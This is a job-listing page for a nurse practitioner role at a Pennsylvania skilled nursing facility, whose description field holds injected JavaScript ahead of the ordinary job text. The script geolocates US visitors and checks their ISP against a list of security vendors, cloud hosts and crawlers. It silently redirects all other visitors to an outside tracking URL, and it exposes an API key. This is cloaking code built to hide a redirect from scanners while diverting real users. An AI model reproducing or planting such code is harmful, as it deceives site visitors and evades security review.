Senior Nurse Practitioner – Skilled Nursing Facility – Altira at Chambersburg

Pittsburgh, PA
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/dcabe4f7385e5fb5/47b5ed4d9aab11631a8662a6ad67553452cfa7e27a08cb92b36d256741ff2291/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Join as a Nurse Practitioner in a Skilled Nursing Facility, providing internal medicine services and leading patient care. Enjoy a healthy work-life balance with flexible scheduling, over 4 weeks of paid time off, comprehensive health benefits, and a retirement plan with employer contributions. Salary ranges from $110,000 to $135,000+ based on experience, with uncapped bonus opportunities and 401(k) matching.

Responsibilities include overseeing daily resident care, evaluating new admissions, conducting discharge and stability visits, managing acute and chronic conditions, prescribing medications, and collaborating with the interdisciplinary team and physicians. Qualifications include an active Pennsylvania APN license with DEA, prior healthcare experience, strong communication, leadership skills, and a Master’s degree.

This full-time role offers in-person work with benefits such as dental, vision, and referral programs. Candidates must have recent skilled nursing facility experience and an active license to qualify.